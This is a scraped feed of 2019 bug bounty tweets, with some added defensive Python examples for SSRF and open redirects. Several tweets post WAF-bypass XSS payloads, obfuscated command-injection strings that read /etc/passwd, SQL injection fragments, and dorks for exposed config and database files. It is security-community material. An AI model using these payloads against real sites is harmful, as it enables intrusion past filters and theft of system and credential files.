0 /dev/random - One Liner For Installing Burp Certificate Into Android Nougat and Later #burp #android #BugBounty #bugbountytip https://t.co/BtVxMMy6Jb
sudoka
@sudo_sudoka


2019-08-31 12:17:54
1 CSP can support you to make a #clickjacking possible even when X-Frame-Options: DENY. #bugbounty #bugbountytip https://t.co/AQf5mQk84W
Proxy
@LinuxKodachi


2019-08-31 06:57:10
0 Here is a google dork to find discord servers. 👉 https://t.co/bmVpQAaOgy "keyword" #bugbountytip #OpenSource #osint #Discord
Elhan
@Elhan65805947


2019-08-30 20:09:48
0 A single little dork can give admin access. Site:https://t.co/AUzqSGF92I companyname.tld Bookmark else keep interesting tabs hanging. >> win! #BugBounty #bugbountytip
Mourad
@SecuAudit


2019-08-30 17:30:33
0 I just lost 3000$USD in 2 days trading Forex, definitely Bug Bounty is more profitable and less risky than trading😰 #BugBounty #bugbountytip
Jenish Sojitra
@_jensec


2019-08-30 16:58:57
0 Yay, I was awarded a $1,200 bounty on @Hacker0x01 for a tricky privilege escalation! "If API endpoint /api/path/ep is throwing 401 try to go with /api/path/ep.json" and it will fetch out the JSON data without checking access control! #bugbountytip
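The .json trick above is what happens when the authorization check runs on the raw request path while the router strips a format suffix before looking the resource up. Added example, not from the tweet: a tiny stand-in dispatcher (route table, user names and records are constructed) with the vulnerable ordering next to the corrected one.

```python
import re

# Constructed route table: one record and the routes that require a login.
RECORDS = {"/api/path/ep": {"id": 1, "owner": "alice"}}
PROTECTED_ROUTES = {"/api/path/ep"}
KNOWN_FORMATS = {"json", "xml"}

# Matches "<route>.<fmt>" where fmt is the last dotted component of the path.
_FORMAT_SUFFIX = re.compile(r"^(?P<route>.+?)\.(?P<fmt>[a-z0-9]+)$", re.IGNORECASE)


def split_format(path):
    """'/api/path/ep.json' -> ('/api/path/ep', 'json'); no known suffix -> (path, None)."""
    m = _FORMAT_SUFFIX.match(path)
    if m and m.group("fmt").lower() in KNOWN_FORMATS:
        return m.group("route"), m.group("fmt").lower()
    return path, None


def handle_vulnerable(path, user):
    """Authorization keyed on the raw path, lookup keyed on the stripped route."""
    if path in PROTECTED_ROUTES and user is None:
        return 401, None  # only the exact string '/api/path/ep' is guarded
    route, _fmt = split_format(path)
    record = RECORDS.get(route)
    if record is None:
        return 404, None
    return 200, record    # '/api/path/ep.json' reaches here unauthenticated


def handle_fixed(path, user):
    """Canonicalise first, then authorize and look up with the same key."""
    route, fmt = split_format(path)
    if fmt is None and "." in route.rsplit("/", 1)[-1]:
        return 404, None  # unknown suffix: refuse rather than guess a route
    if route in PROTECTED_ROUTES and user is None:
        return 401, None  # the check now sees the canonical route
    record = RECORDS.get(route)
    if record is None:
        return 404, None
    return 200, record
```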
sagar yadav
@sagaryadav8742


2019-08-30 16:32:42
0 Hotstar swag 😊 Happy to #secure #hotstar #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #bounty #sagaryadav8742 https://t.co/iAgSxeRFre
Cyberthereaper
@Cyberthereaper3


2019-08-30 16:31:00
0 Is have dork for out of band all injection method? #hackerone #bugcrowd #infosec #bugbountytip
intigriti
@intigriti


2019-08-30 14:19:13
2 Thanks for the #BugBountyTip, @securinti! #HackWithIntigriti (P.S.: You are now banned from our live webinars) 👀🚫 https://t.co/z8Cz3rAUgS
sagar yadav
@sagaryadav8742


2019-08-30 13:37:17
0 #redstorm swag #reward and #hof Happy to #secure #redstorm 😊 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter https://t.co/azpBgqAn21
3P1C
@_3P1C


2019-08-30 13:27:03
0 Bypass for SSRF filter Find a subdomain of your target (whitelisted) that resolves to an internal IP Like this internal[.]target[.]com --> 127.0.0.1 #bugbountytips #bugbountytip @intigriti @Bugcrowd @Hacker0x01
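Both SSRF tips on this page (the userinfo/query/fragment tricks that make the real host differ from the one a naive string check sees, and an allowlisted subdomain that resolves to an internal IP) defeat filters that look at the URL text instead of the parsed host and its resolved addresses. Added example, not from either tweet: the allowlist, hostnames and fake DNS table are constructed for the demo; check_outbound_url and fake_resolver are names chosen here.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist; internal.white.example plays the allowlisted
# subdomain that points at 127.0.0.1.
ALLOWED_HOSTS = frozenset({"white.example", "internal.white.example"})


def resolve_all(hostname):
    """Resolve a hostname to every address it maps to, using real DNS."""
    infos = socket.getaddrinfo(hostname, None)
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def check_outbound_url(url, allowed_hosts=ALLOWED_HOSTS, resolver=resolve_all):
    """Return (ok, reason) for a user-supplied URL the server is about to fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    # "white.example@black.example": urlsplit puts white.example in username
    # and black.example in hostname, so a substring match on the URL is fooled.
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    host = (parts.hostname or "").rstrip(".")  # lower-cased; no port/query/fragment
    if not host:
        return False, "missing host"
    # "black.example?white.example" and "black.example#white.example" leave
    # white.example in the query/fragment; only the hostname is compared here.
    if host not in allowed_hosts:
        return False, f"host {host} not allowlisted"
    # A name on the allowlist may still resolve to loopback or RFC 1918 space,
    # so every resolved address has to be publicly routable. The fetch itself
    # should connect to one of these checked addresses rather than resolving
    # again, otherwise a changed (rebinding) answer goes unchecked.
    try:
        addrs = resolver(host)
    except (socket.gaierror, ValueError) as exc:
        return False, f"resolution failed: {exc}"
    for addr in addrs:
        if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
            addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
        if not addr.is_global:
            return False, f"{host} resolves to non-public {addr}"
    return True, "ok"


# Constructed DNS table so the demo runs offline and deterministically.
FAKE_DNS = {
    "white.example": ["93.184.216.34"],       # constructed public address
    "internal.white.example": ["127.0.0.1"],  # allowlisted name, loopback target
    "black.example": ["93.184.216.35"],
}


def fake_resolver(hostname):
    try:
        return [ipaddress.ip_address(a) for a in FAKE_DNS[hostname]]
    except KeyError:
        raise socket.gaierror(f"constructed NXDOMAIN for {hostname}")


def demo():
    urls = [
        "https://white.example/api/data",
        "https://white.example@black.example/",
        "https://black.example?white.example",
        "https://black.example#white.example",
        "https://internal.white.example/admin",
        "file:///etc/hostname",
    ]
    return {u: check_outbound_url(u, resolver=fake_resolver) for u in urls}
```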
Fisher
@Regala_


2019-08-30 09:42:22
2 Yes!! Burp Scope Monitor just reached its 100th⭐️!! 🥳🥳 If you haven't used it yet, have a look at https://t.co/2zzgrNvj3G. Currently I'm especially looking for bugs/improvements suggestions so I can work on them later. #bugbounty #bugbountytip #infosec #pentest
Fady Othman
@Fady_Othman


2019-08-30 05:37:29
1 Do you think recording video tutorials using a 21:9 format (Wide Screen) is a good idea? #bugbounty #bugbountytips #bugbountytip
The_unstable
@chaskar_shubham


2019-08-29 13:03:23
0 I rewrote Recce from scratch! It is now much faster than the previous version. It can now detect the server, and you can write output to a CSV file. https://t.co/CGFQHNaA64 Check it out! #bugbountytips #bugbountytip #bugbounty #InformationSecurity #infosec #infosecurity #hackerone #bugcrowd
Jagannath
@SecurityBoy0x01


2019-08-29 09:56:59
0 [Protip] Passwords using leetspeak are much safer than normal passwords against brute-force attacks with word-lists. E.g. '53CURI7Y' is much more secure than 'Security', when combined with password managers. #bugbountytip #Password #hacking
Cyberthereaper
@Cyberthereaper3


2019-08-28 22:59:14
0 The biggest obstacles that will get in your way in bug bounty programs: Ruby web pages, JSON content-type, AkamaiGHost, CloudFront, Cloudflare #BugBounty #hackerone #bugcrowd #intigriti #infosec #bugbountytip
Julien Ahrens
@MrTuxracer


2019-08-28 18:23:55
1 I recently got a maximum bounty for: Reflected XSS -> Grabbed user's identity token (no auth) -> Found auth logic error that converted the token w/o the user's pwd into an auth token -> ATO & 2FA Bypass. Always maximize your impact! #togetherwehitharder #bugbountytip #BugBounty
Yadhavi
@PrincessYadhavi


2019-08-28 16:42:39
0 What rate do you use to get the best results from masscan? (1024 hosts, $5 DigitalOcean VPS) #bugbounty #bugbountyhelp #bugbountytip #bugbountytips #masscan
Random Robbie
@Random_Robbie


2019-08-28 10:32:27
3 #bugbountytip BUGROBBIE for discount on @binaryedgeio
Cache Bounty @127.0.0.1
@Cache_Bounty


2019-08-28 09:06:40
1 Old but very useful: https://t.co/j1GHbfHNsc #security #bugbountytip #bugbountytips
Michael Eder
@michael_eder_


2019-08-28 08:33:10
1 Authenticated dirbusting 1) Log in w/ Firefox>DevTools>Network>reload page 2) Right click request, "copy curl" 3) rustbuster <your regular rustbuster options> <all -H parameters of the curl command> 4) Profit #infosec #bugbountytip #pentest
kaustubh padwad
@s3curityb3ast


2019-08-28 08:13:39
1 Ever Happen'd this @Hacker0x01 with known guys.. @sagarparmar121 @niksthehacker @stokfredrik @fransrosen @emgeekboy @Parth_Malhotra #bugbountytip #bugbounty @gwendallecoguic #hackerone #bugcrowd @SynackRedTeam is exception for this sharp 24Hrs payout.. ;) Just for Fun #bontyfun https://t.co/wyuV36SLWt
Nihad
@nihad_rekany


2019-08-28 08:09:48
0 Feeling love 🥰🥰 @fbsecurity #bugbountytip #bug https://t.co/Pc9V8CSJuu
Nihad
@nihad_rekany


2019-08-28 08:08:24
0 Thank you @fbsecurity 🥰🥰🥰 #bugbountytip https://t.co/jnggbyDNx8
Neeraj Edwards
@neeraj_sonaniya


2019-08-28 05:29:04
2 Revealing AWS S3 bucket name: step 1: Find any CDN object URL step 2: append following string to after URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc ` and boom it will reveal the bucket name. #BugBounty #security #bugbountytip #bugbountytips https://t.co/JWqGuZLHW4
Ahmed Lekssays
@Lekssays


2019-08-27 22:51:16
0 I made a tool to Extract Open Kibana Instances on Internet and Map them to their Corresponding Organizations using SSL certificates for Bug Bounty Programs. You can check it out: https://t.co/IQQIKdaAaC Happy hunting ;) #bugbounty #bugbountytip
Radek
@radekk


2019-08-27 19:45:52
1 Read how to use Burp Suite with multiple Firefox profiles - https://t.co/xqRPeT8NfC #bugbountytip #bugbounty
Aussan 🇨🇦
@aussan_m


2019-08-27 18:15:36
1 #bugbounty #bugbountytip When you get a bounty try to remember that there are people in need out there...try to give to charities, ... helping companies become secure is great, but helping others is even better.... remember what goes around comes around....
kaustubh padwad
@s3curityb3ast


2019-08-27 16:31:02
0 If you ever built such a complex query and it returned 404 in a "boolean-based blind SQL injection" AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x21) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70686f746f73. what would your reaction be... #bugbountytip #ctf
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-27 00:31:48
3 CloudFlare {"HTML TO XSS"}; ~byPass Detected. 📡 [" <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "] #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-26 23:48:19
0 CloudFlare {"XSS"}; ~byPass Detected. 📡 <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-26 21:52:05
0 I think one of the pages you hate to open the XSS alert box on is one that uses the Ruby software language. #bugbounty #bugbountytip #hackerone #bugcrowd #infosec #redteam #xss #hacking
Murdockz
@Murdockz_CEH


2019-08-26 17:36:42
0 Created my first "Real" python script that decodes any base64 string...I think lol. Don't judge me it's my first time learning python lol. Check it out. #bugbountytip #bugbountytips #bugbounty https://t.co/rSnsf6BoBb
kaustubh padwad
@s3curityb3ast


2019-08-26 17:19:32
0 This is how I learn SQL injection nowadays... #rofl #ctf #SQL #injection #bugbountytip #wireshark #hackerone #AppSec but I can imagine how tough this is to exploit, since sqlmap is taking too much time, now 2+ hours with --dump-all... :) https://t.co/t1G0qtaNQh
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-26 16:50:20
0 Regexp trying detect Open redirect in response for burp #bugbountytips #bugbountytip https://t.co/LTbegfJf77
Murdockz
@Murdockz_CEH


2019-08-26 09:48:23
1 My first bug crowd P1. API Keys, Firebase Tokens, Account username and password. Recon wins. #BugBounty #bugbountytip #bugbountytip https://t.co/K6C0mnajQH
Hussein Daher
@HusseiN98D


2019-08-25 14:31:51
10 As per the vote results, here you go! A cool XXE resulting from a SSRF found on local company website during a pentest. DMs are open, retweet and like if you love this style of PoC! 😎 #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/XbwBLdYO33
gautam bhatia
@gautambhatia57


2019-08-25 11:14:23
0 Thanks a lot @defcon @DCG91135 @Bugcrowd @lab401 @infosecgirls @hackthebox_eu @PortSwigger for amazing workshop at DIT University #infosec #security #reversing #bugbountytip #rfid https://t.co/wqtmwLM4y9
Arif Khan
@payloadartist


2019-08-24 14:17:36
2 Another awesome research by a god of websec @filedescriptor: The Cookie monster in your browsers https://t.co/x051kiyWgJ #BugBounty #BugBountyTip
Hussein Daher
@HusseiN98D


2019-08-24 13:52:55
1 My next #bugbountytip PoC (check my Twitter for a preview of the old ones) should talk about: #bugbounty
Yogendra Jaiswal
@vulnh0lic


2019-08-24 13:28:31
17 Just Published article of [iOS Application Security] Jailbreak 12.4 and SSL pinning bypass | How to set up your iOS Testing Lab https://t.co/kVAs20V8dC #infosec #bugbountytip #sslbypass #jailbreak #iOS124 #unc0ver Thanks, @prateek_0490 and @Yassineaboukir @jpjaypatel34
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-24 11:25:33
1 Time US : 10:00 Time ID : 21:00 Bug Bounty Live! basic #recon , VulnerabilityAnalysis #shodan Live at : https://t.co/QdsrDoweOQ Follow Live streams and share... #BugBounty #bugbountytips #bugbountytip #hackerone #bugcrowd
Raihan Biswas 🇨🇮
@zapstiko


2019-08-24 05:01:29
3 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Vitthal Shinde
@0_1VitthalS


2019-08-24 04:11:48
1 If you found a hardcoded slack token, you can use it to get invitation to slack group. https://t.co/OMxs8QFVjQ<slack_token>&channel=CL0KQ4SK1&user=<email>&pretty=1 #BugBountyTip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-23 06:41:14
1 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Uranium238
@uraniumhacker


2019-08-22 18:02:56
1 Have your tools exporting stuff as JSON? use Panda to export it as a .db file. You can then use client side js to parse the db and query through it. #bugbountytip
contra_security
@security_contra


2019-08-22 17:46:16
0 Analysis of Ruby rest-client 1.6.13 backdoor https://t.co/KGSXYpw68B @snyksec #owasp #backdoor #ruby #appsec #bugbountytip
m0z
@LooseSecurity


2019-08-22 16:47:55
6 file.php?url=/admin/ Redirects to: https://t.co/xsJrSUcfgM Put URL [email protected] Now it is [email protected] which redirects to https://t.co/ptXaIXLfKk! #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity
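The tip above relies on the URL userinfo separator: once the site's own host is followed by `@`, a browser treats it as a username and goes to whatever host comes after. The following is an added example, not the tweeter's code (the tweet's URLs are shortened, so the exact strings are not recoverable). It assumes the redirect is built by prefixing the site origin to a user-supplied value; `target.example` and `attacker.example` are constructed names.

```python
"""Open redirect through the URL userinfo separator, modelled.

Added example, not code from the tweet. It assumes the redirect is built
by prefixing the site origin to a user-supplied path; target.example and
attacker.example are constructed.
"""
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

SITE_HOST = "target.example"


def vulnerable_redirect(user_value: str) -> str:
    # Bug: string concatenation. '/admin/' gives https://target.example/admin/,
    # but '@attacker.example' gives https://target.example@attacker.example,
    # where 'target.example' has become the userinfo and the host is the attacker's.
    return "https://" + SITE_HOST + user_value


def final_host(url: str) -> Optional[str]:
    """Where a browser would actually go."""
    return urlsplit(url).hostname


def hardened_redirect(user_value: str) -> Optional[str]:
    """Accept only a site-relative path; return None for anything else."""
    # Reject anything not starting with a single '/', network-path references
    # ('//host'), and backslashes (browsers normalise '\' to '/').
    if not user_value.startswith("/") or user_value.startswith("//") or "\\" in user_value:
        return None
    parts = urlsplit(user_value)
    if parts.scheme or parts.netloc:
        return None
    # Build the target from parts instead of concatenating strings.
    url = urlunsplit(("https", SITE_HOST, parts.path, parts.query, ""))
    # Re-parse the result and confirm the host survived; fail closed otherwise.
    if final_host(url) != SITE_HOST:
        return None
    return url


if __name__ == "__main__":
    for v in ("/admin/", "@attacker.example", "//attacker.example/", "/[email protected]/x"):
        print(repr(v), "->", final_host(vulnerable_redirect(v)), "|", hardened_redirect(v))
```

Note that `/[email protected]/x` is accepted by the hardened version: an `@` inside the path is harmless, only an `@` in the authority part changes the destination, which is why the check parses rather than searching for characters.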
Prateek Tiwari
@prateek_0490


2019-08-22 15:47:03
4 Really shocking to see how companies leave their log instances exposed to the public. I'm referring to #Kibana; over the last few weeks I have found a lot of them and reported them to companies that have BBPs. Dork - inurl:app/kibana Shodan - title:"kibana" port:"443" #bugbountytip #bugbounty
sudoka
@sudo_sudoka


2019-08-22 10:57:15
0 I've seen some websites block exactly the string "alert(something)" #xss #bypass #bugbountytip https://t.co/MKOSMHdKcA
Dhamu
@Dhamuharker


2019-08-22 09:11:57
2 #bugbountytips #BugBounty Finally Got it Root Access. Thanks for @orange_8361 @ProjectZeroIN the exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510) https://t.co/k1Qk45QnCq #bugbountytip #ItTakesACrowd #TogetherWeHitHarder https://t.co/lwJi2ss068
Anton Korzhynskyi
@page_1337


2019-08-21 21:42:14
0 My turn :) Cloudflare #XSS #Bypass <img src onerror=%26emsp;prompt`${document.domain}`> #WAF #BugBounty #BugBountyTip https://t.co/UxkKOfkioC
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-21 19:54:51
1 ModSecurity {" XSS "} ~Bypass braindeath; ⓾ ~1; " %3Cspyerror%20script%20goes%20here%3E=%0AByPass " ~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E" #BugBounty #BugBountyTip #WAF #infosec
CaptainFreak
@0xCaptainFreak


2019-08-21 12:09:46
0 On Rails targets, many people don't try XSS tests, knowing that Rails by default doesn't reflect without escaping/encoding. But "security conscious" devs mistake the "html_safe" method of Rails for escaping, while it does the exact reverse. Hence, XSS lives on. #bugbountytip
Abugzlife
@abugzlife1


2019-08-21 01:39:35
5 Have you ever thought to yourself: “You know what, I’m really curious what the methodology for finding bugs of an average bug hunter who focuses on depth rather than breadth looks like!” Well, now is your chance to see! https://t.co/ih8hwmaIP6 #bugbountytip #bugbounty
plenum 🇹🇳
@plenumlab


2019-08-20 23:21:47
1 To those who struggle to get into bb: I barely knew what HTTP requests look like, 14 duplicates and 4 N/A before my first valid report. Don't quit; every minute, every inspected HTTP request is experience #bugbountytips #bugbountytip
Ammar Amer
@cry__pto


2019-08-20 23:15:45
1 I think you should visit my repository; you may find something useful about hacking & pentesting & cybersecurity & red team & malware. Almost 2000 links & almost 1000 articles as PDF files. Enjoy and #happy_hacking https://t.co/q2layzVpKz #sharingiscaring #bugbountytip #OSINT https://t.co/DWQFvHpWuN
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-20 19:03:48
0 Yay, I found a Jira dashboard at @Hacker0x01 #DOD. Exploiting the Jira dashboard leads to RCE. This report is waiting to be disclosed/fixed, and waiting for #writeups #BugBounty #bugbountytip #rce #jira_rce https://t.co/T0M5Zr8q2B
Rishabh
@____cypher____


2019-08-20 18:35:23
0 Did you know you can "edit and resend" requests without any interceptor in Mozilla firefox #bugbountytip #BugBounty https://t.co/FrtUB2KUO8
Raihan Biswas 🇨🇮
@zapstiko


2019-08-20 15:08:22
4 {XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Faizal Abroni
@faizalabroni


2019-08-20 13:58:44
0 AWS Metadata Disclosure via hardcoded host download (Indonesian language) https://t.co/lkxDPZ8VN8 #bugbounty #bugbountytip #bugbountytips #togetherwehit #ittakesacrowd
C1h2e1
@C1h2e11


2019-08-20 13:34:45
2 A tip from Nahamsec @NahamSec: curl -X GET https://t.co/pIuaaFEPZL{organization} https://t.co/5XaiHYznhj{organization} https://t.co/7AlvIjzWht{IP address} Shodan search query ASN:{ASN} #bugbountytip #bugbountytips https://t.co/RGdbP6rj4u
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-20 13:08:57
3 {XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Securisec 🚀
@securisec


2019-08-20 11:34:28
0 "RT RT Regala_: Here it is! Burp Scope Monitor, a simple Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/EFXtxmOLEE #bugbounty #bugbountytip 🥳🥳😇"
Cyberthereaper
@Cyberthereaper3


2019-08-20 10:54:47
0 sometimes we cannot find vulnerabilities due to a web browser problem. #hackerone #bugcrowd #infosec #bugbounty #bugbountytip #blackhat #defcon #redteam #LFI #RFI #hacking #chrome #firefox #recon #osint example : https://t.co/D0RK0uDcB2
Sergey Kashatov
@iframe0x01


2019-08-20 10:25:10
1 #hackerone #bugbounty #bugbountytip I just published How I upgraded my privileges to the administrator of Odnoklassniki’s url shortener https://t.co/yBKYctUp0a
Fisher
@Regala_


2019-08-20 09:20:01
14 Here it is! Burp Scope Monitor, a simple @Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/2zzgrNvj3G #bugbounty #bugbountytip 🥳🥳😇
luffydragneel
@Hackers_Guild


2019-08-20 06:53:26
0 If there is a subscription for a pro account for, say, 1 year, always intercept the request and change the subscription period. In some cases you will be able to increase the subscription to any number of years, leading to a business logic vuln. #bugbountytip @SynackRedTeam https://t.co/NLDXDbquzY
Osama Avvan
@osamaavvan


2019-08-19 18:07:09
1 My Writeup about Different Ways of Exploiting CSRF. https://t.co/yneogH4EYL #bugbountytip @bugbountypocs
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-19 16:40:35
0 { WAF }; bypass post based xss ✨ ~Payload; <message><dialogueType>&e;</dialogueType></message> ~Result; WAF Allowed: 200 #BugBounty #BugBountyTip #WAF #infosec https://t.co/f28Yby7WZR
Soroush Dalili
@irsdl


2019-08-19 11:33:43
0 #BugBountyTip: To make your Burp Suite testing faster, change its colour to Red! With go faster stripes as suggested by @bao7uo
Proxy
@LinuxKodachi


2019-08-19 11:27:51
0 🛡 Honest advice, Sherlock! 🛡 #bugbountytip #mentor #entrepreneur #Developer #programming #programmers #startup https://t.co/0I8cofTS3X
ak1t4 🇦🇷
@akita_zen


2019-08-19 06:38:08
2 #Bugbountytip: avoid defining yourself by what you know, what you have or what you get ($$$). You are truly unique and your being can’t be defined by a temporal status. Enjoy bugbounty, play a little, bb needs to be fun :) #bugbounty #infosec #mentalhealth
Cyberthereaper
@Cyberthereaper3


2019-08-19 06:33:41
4 S3 bucket finder cat subdomain.txt | httprobe | tee hosts && meg -d 1000 -v / && grep -horiE '[A-Za-z0-9.-]+\.s3\.amazonaws\.com' (You can change the regex or add more regexes with &&) @TomNomNom #hackerone #bugcrowd #recon #infosec #blackhat #bugbounty #bugbountytip #osint #s3
mr_nyx
@mr_nyxs


2019-08-18 19:11:24
1 Never give up! Payload URLENCODE(payload) URLENCODE(URLENCODE(payload)) URLENCODE(URLENCODE(URLENCODE(payload))) ... #BugBountyTip #BugBounty
HackIsOn ®
@hackison


2019-08-18 17:33:00
0 What will be your answer to the following question #infosec people? 🤔 How to #hack android phones using Link ? 😂 #hacking #pentesting #linux #bugbounty #bugbountytip #exploit #kalilinux #offsec #redteam #pentester #hackison #wapt #vapt
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 17:12:44
2 Hi babe again I'm, whats up fbi. I warned very , lest he remove the search button from there. 💣 Patch: https://t.co/NhIAxHWUUl #BugBounty #BugBountyTip #WAF #infosec https://t.co/azwQwX5nMh
YS
@YShahinzadeh


2019-08-18 16:45:08
0 JSONP call returning auth token -> acc takeover #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-08-18 15:42:00
0 Don't expect different assets/endpoints if you are searching in the same subdomain. #bugbountytip #BugBounty #WebPentest #SearchSomethingElse
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 14:21:24
5 "Cloudflare"; live payloads: 🧠 ~1: <img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'> ~2: <img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//"" src="x" alt="showme"> #BugBounty #BugBountyTip #WAF
NetDevilz
@netdevilz


2019-08-18 13:03:14
0 Time may have forgotten everything, never date ... #netdevilz İCANN: https://t.co/FZafbc6qaj #bugbounty #webapp #bugbountytip #infosec #waf https://t.co/sYW3KKhdSo
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 08:43:13
1 Sucuri { RCE }; payloads, dot shot. 🌪️ Smuggling RCE Payloads: </> /???/??t+/???/??ss?? </> Obfuscating RCE Payloads: </> ;+cat+/e'tc/pass'wd </> </> c\\a\\t+/et\\c/pas\\swd </> #BugBounty #BugBountyTip #WAF #infosec
Str0k1rch
@str0k1rch


2019-08-18 08:32:02
1 Do you guys stop trying for XSS When Cloudflare is used? If not, got any tips? :) #bugbountytip #bugbounty #infosec
Murdockz
@Murdockz_CEH


2019-08-18 02:47:26
1 Guys if you're looking for a way to host a Kali Linux instance in the cloud check out this tutorial on creating your own Kali Linux cloud VM with DigitalOcean https://t.co/xnP1cfd8lZ. I highly recommend. https://t.co/0TpWOKInke #bugbountytips #bugbountytip #bugbounty
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-17 20:41:53
4 ModSecurity { RCE } Detection Bypass 💥 { 1 }; ;+$u+cat+/etc$u/passwd$u { 2 }; ;+$u+cat+/etc$u/passwd+\# #BugBounty #BugBountyTip #WAF #infosec
John
@JohnH4X00R


2019-08-17 18:23:03
2 "Rather than scanning for vulnerabilities, we need to scan for interesting behaviours"... Excellent advice by @albinowax from an old gem, must read... https://t.co/9FPy2OnCBM #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-17 18:22:39
2 Bug Bounty Tip : Target Android Mobile Apps to get the Endpoints/Hostnames and Run PortScan -- #BugBounty #BugBountyTip #hackdoor
C1h2e1
@C1h2e11


2019-08-17 13:41:05
1 #BugBounty #bugbountytip Try to scan these sensitive files or add a header for a quick vulnerability scan https://t.co/ZuZ5xMEqmj
Ammar Amer
@cry__pto


2019-08-17 03:29:40
2 The two most important free resources on the net to learn how to detect & exploit open redirects & evade WAFs. If you are serious about learning this vulnerability you should visit these sites. https://t.co/IgbCjfguvb https://t.co/dGFkRiy43A https://t.co/1R23RdPEDN #bugbountytip
Soroush Dalili
@irsdl


2019-08-16 21:46:24
3 After spending so much time, finally here it is: "𝗨𝗽𝗹𝗼𝗮𝗱𝗶𝗻𝗴 𝘄𝗲𝗯.𝗰𝗼𝗻𝗳𝗶𝗴 𝗳𝗼𝗿 𝗙𝘂𝗻 𝗮𝗻𝗱 𝗣𝗿𝗼𝗳𝗶𝘁 𝟮" https://t.co/L2XrRRfqU6 #appsec #FileUpload #pentest #bugbountytip https://t.co/O3jVp0TWVq
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-16 21:18:20
0 #burp, #bugbountytip,#bugbountytips Recon with BurpSuite. Only burp no extender. I like this way. https://t.co/siOc5UaDLf
SALTWRX
@SaltwrxLLC


2019-08-16 17:14:00
1 @AFSLabs For those looking to setup a droplet for doing reconnaissance. #bugbountytip
HackIsOn ®
@hackison


2019-08-16 14:45:08
0 [Sensitive Directories] intitle:"Index of" wp-config.php [Sensitive Directories] intitle:index.of./.sql [Pages Containing Login Portals] site:*/cgi-bin/login.html [Various Online Devices] inurl:ftp://ftp robots.txt #dorks #hacking #bugbountytip #bugbountytips #pentesting
Milind Purswani
@MilindPurswani


2019-08-16 14:28:52
0 Have been testing for SSRF bypass for more than 2 hours on 1 endpoint -> Read the policy -> turns out, the endpoint is OOS. "Read the docs man! Read the docs!" 😑😑 #bugbountytip
OWASP Amass
@owaspamass


2019-08-16 14:23:16
0 OWASP Amass Fact: If you use the '-include' flag to reduce sources during your enum, be sure to include one or more of the following for ASN info: networksdb, radb, robtex, shadowserver, teamcymru and/or umbrella #osint #recon #bugbounty #bugbountytip https://t.co/QWTftRbJKT
expl0itc0der
@vanshitmalhotra


2019-08-16 14:04:28
